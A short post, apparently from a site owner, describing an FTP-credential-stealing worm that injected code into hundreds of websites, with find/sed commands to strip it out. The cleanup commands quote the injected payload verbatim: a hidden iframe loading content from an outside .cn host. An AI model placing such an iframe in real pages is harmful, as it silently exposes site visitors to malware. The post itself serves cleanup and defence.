This is a virus / worm that steals your ftp login information from your ftp programs and modifies lots of php / html / htm pages on all of the sites it can access.
We got hit yesterday and it modified hundreds different websites from small blogs upto large commercial websites.
You will find lots of entries in your ftp logfile showing someone downloading the file and then re uploading it again.
It appears to destructively modify the files overwriting whatever text was there – the file size will be the same after it’s been modified.
These commands will remove the code and replace it with a space character :
find . -name ‘*.php’ -exec sed -i ‘s#<iframe src=”https://technologybigtop.cn:8080/ts/in.cgi?pepsi14″ width=12 height=12 style=”visibility: hidden”></iframe># #’ {} \;
find . -name ‘*.html’ -exec sed -i ‘s#<iframe src=”https://technologybigtop.cn:8080/ts/in.cgi?pepsi14″ width=12 height=12 style=”visibility: hidden”></iframe># #’ {} \;
find . -name ‘*.htm’ -exec sed -i ‘s#<iframe src=”https://technologybigtop.cn:8080/ts/in.cgi?pepsi14″ width=12 height=12 style=”visibility: hidden”></iframe># #’ {} \;
